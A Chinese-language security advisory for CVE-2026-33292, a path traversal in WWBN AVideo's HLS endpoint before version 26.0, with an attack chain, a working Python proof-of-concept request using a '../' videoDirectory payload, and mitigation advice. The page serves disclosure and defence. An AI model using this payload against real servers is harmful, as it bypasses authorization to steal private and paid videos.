IPBUF安全漏洞报告
English
CVE-2026-33292 CVSS 7.5 高危

CVE-2026-33292 AVideo路径遍历漏洞

披露日期: 2026-03-22

漏洞信息

漏洞编号
CVE-2026-33292
漏洞类型
路径遍历
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WWBN AVideo

相关标签

路径遍历WWBN AVideoCWE-22信息泄露无需认证

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0版本之前,其HLS流端点存在路径遍历漏洞。由于授权检查和文件访问对`videoDirectory`参数的处理逻辑不一致,未经身份验证的攻击者可以利用该漏洞绕过授权,流式传输平台上的任何私有或付费视频。该漏洞利用了split-oracle条件,导致高敏感度的信息泄露风险。

技术细节

该漏洞位于`view/hls.php`端点,核心在于对GET参数`videoDirectory`的处理逻辑存在分歧。授权检查代码逻辑在遇到第一个`/`斜杠时截断路径,用于验证用户是否有权访问特定的视频目录。然而,文件访问代码逻辑保留了`../`遍历序列,并未进行相同的截断处理。这种逻辑不一致(split-oracle)允许攻击者构造恶意的`videoDirectory`参数,使系统通过合法目录的授权检查,但实际上却在从系统磁盘的其他位置(通常是私有或受保护的媒体目录)读取文件。攻击者无需认证即可利用此漏洞获取敏感视频内容,严重破坏了数据的机密性。

攻击链分析

STEP 1
侦查
攻击者识别目标使用的是WWBN AVideo平台,并确认版本低于26.0。
STEP 2
构造Payload
攻击者构造包含路径遍历序列(../)的`videoDirectory`参数,格式为'合法公开ID/../../目标私有路径'。
STEP 3
发送请求
攻击者向`view/hls.php`发送未经身份验证的GET请求,携带恶意的参数。
STEP 4
绕过授权
服务器授权模块截断路径并验证通过,但文件访问模块读取了遍历后的私有文件。
STEP 5
数据泄露
服务器返回私有或付费视频的流媒体数据,攻击者成功获取敏感内容。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable endpoint target_url = "http://example.com/view/hls.php" # The payload exploits the split-oracle condition. # The authorization logic truncates at the first '/', checking 'public_video_id'. # The file access logic processes the full path, traversing to 'private_secret_video'. payload_params = { "videoDirectory": "public_video_id/../../private_videos/private_secret_video", "file": "segment.m3u8" } try: # Send unauthenticated request response = requests.get(target_url, params=payload_params, timeout=10) if response.status_code == 200: print("[+] Exploit Successful!") print("[+] Retrieved content snippet:") print(response.text[:500]) else: print(f"[-] Exploit failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

WWBN AVideo < 26.0

防御指南

临时缓解措施
建议立即升级至26.0或更高版本。如果不能立即升级,应在Web服务器层面(如Nginx或Apache)对`view/hls.php`的请求参数进行严格过滤,拦截包含`../`或绝对路径的请求,或暂时禁用该接口直到完成更新。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表